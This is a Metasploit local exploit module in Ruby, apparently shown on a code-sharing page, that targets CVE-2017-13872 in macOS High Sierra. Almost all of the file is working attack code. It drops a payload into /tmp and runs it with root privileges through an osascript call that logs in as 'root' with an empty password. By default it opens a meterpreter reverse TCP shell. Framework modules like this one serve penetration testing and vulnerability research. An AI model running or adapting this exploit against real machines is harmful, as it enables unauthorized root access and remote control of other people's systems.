Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::OSX::Priv
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'          => 'Mac OS X Root Privilege Escalation',
17
      'Description'   => %q{
18
        This module exploits a serious flaw in MacOSX High Sierra.
19
        Any user can login with user "root", leaving an empty password.
20
      },
21
      'License'       => MSF_LICENSE,
22
      'References'    =>
23
        [
24
          [ 'CVE', '2017-13872' ],
25
          [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
26
          [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
27
          [ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
28
        ],
29
      'Platform'      => 'osx',
30
      'Arch'          => ARCH_X64,
31
      'Author'         => [
32
        'chethan177',  # earliest public discovery
33
        'lemiorhan',   # making this well-known via Twitter
34
        'timwr',       # Metasploit module
35
      ],
36
      'DefaultOptions' =>
37
      {
38
        'PAYLOAD'      => 'osx/x64/meterpreter_reverse_tcp',
39
      },
40
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
41
      'Targets'       => [
42
        [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
43
      ],
44
      'DefaultTarget' => 0,
45
      'DisclosureDate' => '2017-11-29'
46
    ))
47
  end
48

49
  def exploit_cmd(root_payload)
50
    "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
51
  end
52

53
  def exploit
54
    if is_root?
55
      fail_with Failure::BadConfig, 'Session already has root privileges'
56
    end
57

58
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
59
    print_status("Writing payload file as '#{payload_file}'")
60
    write_file(payload_file, payload.raw)
61
    register_file_for_cleanup(payload_file)
62
    output = cmd_exec("chmod +x #{payload_file}")
63
    print_status("Executing payload file as '#{payload_file}'")
64
    cmd_exec(exploit_cmd(payload_file))
65
  end
66
end
67

68